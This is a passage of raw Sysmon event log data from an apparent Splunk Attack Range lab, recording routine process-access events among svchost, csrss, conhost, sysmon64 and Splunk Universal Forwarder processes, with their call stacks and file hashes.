Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978936Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8AFA-6151-C879-00000000FD01}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978935Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978934Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978933Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978932Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978931Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978930Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978929Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978928Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978927Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978926Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8AFA-6151-C879-00000000FD01}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978925Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.373{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8AFA-6151-C879-00000000FD01}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978924Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.358{69CF5F33-8AFA-6151-C879-00000000FD01}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:27.390{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=275DE0177CF8356D4A3AB60F4A593668,SHA256=216DC7BA1119EF410EC98E780505A601AFB91290E2D672745672B694184C3AFD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978967Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.795{69CF5F33-8AFB-6151-CA79-00000000FD01}9962688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978966Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8AFB-6151-CA79-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978965Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978964Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978963Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978962Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978961Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978960Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978959Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978958Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978957Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8AFB-6151-CA79-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978956Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978955Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.576{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8AFB-6151-CA79-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 